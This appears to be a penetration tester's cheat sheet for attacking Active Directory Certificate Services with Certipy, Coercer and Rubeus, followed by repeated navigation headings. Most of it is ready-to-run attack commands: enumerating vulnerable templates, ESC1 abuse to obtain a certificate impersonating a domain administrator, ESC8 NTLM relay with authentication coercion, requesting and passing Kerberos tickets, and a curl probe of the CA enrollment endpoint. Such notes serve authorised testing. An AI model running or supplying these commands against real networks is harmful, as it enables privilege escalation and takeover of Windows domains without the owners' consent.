certipy.py

Find all certs

certipy find -u user@domain.com -p '' -debug

Hint: use -scheme ldap if you get a bunch of annoying ldap errors!)

Find all VULNERABLE certs

certipy find -vulnerable -u user@domain.com -p '' -debug

Hint: use -scheme ldap if you get a bunch of annoying ldap errors!)

Abuse ESC1

sudo certipy req -username lowpriv@domain.com -password 'winter2021' -ca CA-01 -target vuln.domain.com -template 'vuln-template' -upn da-i-want-to-impersonate@domain.com -dns fqdn-of-a-dc.domain.com -key-size 4096

Auth with the cert you just got

certipy auth -pfx administrator.pfx -dc-ip 172.16.126.128

Abuse ESC8

certipy relay -target vulnca.domain.com -template DomainController / KerberosAuthentication /DC

Coerce auth

sudo python3 /opt/coercer/Coercer.py coerce -u x -p x -t x -l x

Abuse the cert

certipy auth -pfx blah.pfx -domain domain.com
rubeus.exe asktgt /domain:domain.com /user:blah /rc4:NTLMHASH /nowrap
rubeus.exe ptt /ticket:THE-PTDC01-TGT-YOU-COPIED-TO-YOUR-CLIPBOARD-EARLIER

Sanity check the CA is vulnerable to ESC8 with curl!

curl -sSLkI -u 'NETBIOS-NAME-OF-DOMAIN\user:password' --ntlm https://name.of.the.ca/certsrv/certfnsh.asp'

If you get 401 unauthorized the endpoint has been hardened.

Note: if I call this file certipy.md in the file hierarchy, docusaurus crashes. Wassupwitdat? I raised an issue in GitHub for this

Find all certs​

Find all VULNERABLE certs​

Abuse ESC1​

Auth with the cert you just got​

Abuse ESC8​

Coerce auth​

Abuse the cert​

Sanity check the CA is vulnerable to ESC8 with curl!​

Find all certs

Find all VULNERABLE certs

Abuse ESC1

Auth with the cert you just got

Abuse ESC8

Coerce auth

Abuse the cert

Sanity check the CA is vulnerable to ESC8 with curl!